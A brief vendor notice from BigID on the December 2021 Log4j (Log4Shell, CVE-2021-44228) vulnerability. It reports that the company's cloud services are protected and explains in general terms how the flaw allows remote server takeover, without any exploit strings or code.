Update on Apache Log4J (Log4Shell) Vulnerability
On December 10, 2021, Security researchers discovered a zero-day vulnerability in Java logging libraries that can affect millions of cloud and enterprise applications, published as CVE-2021-44228, and by the labels Log4Shell and LogJam. Affecting much more than just Minecraft, this vulnerability extends to cloud services from Apple iCloud to twitter and beyond.
The BigID team acted immediately and has been working since yesterday to protect our customers from the impact of the exploit. All BigID cloud services (including BigID Cloud, SmallID, BigID.me and Privacy Portal) are currently protected with updated security configurations to continue to protect against the vulnerability.
Identifying risk and assuring the protection of our customers are our priority, and we are continuing to work directly with our customers to provide guidance and support to protect their on-prem implementations.
What is Log4j?
Log4j is an open-source Apache logging system framework used by developers for recordkeeping within an application. Log4j is a java library used broadly across enterprise software and cloud applications, including Amazon, Apple iCloud, Tesla, Twitter, RedHat, Micecraft, and more.
CVE-2021-44228 is an Apache software vulnerability in which attackers can send malicious code that can potentially result in them gaining control of the server.
Log4Shell or LogJam are related exploits, and the vulnerability means that an attacker can strategically send a string to be logged by Log4j – which can then be used to remotely take over a server.
We will continue to monitor as this evolves, and will update with any changes.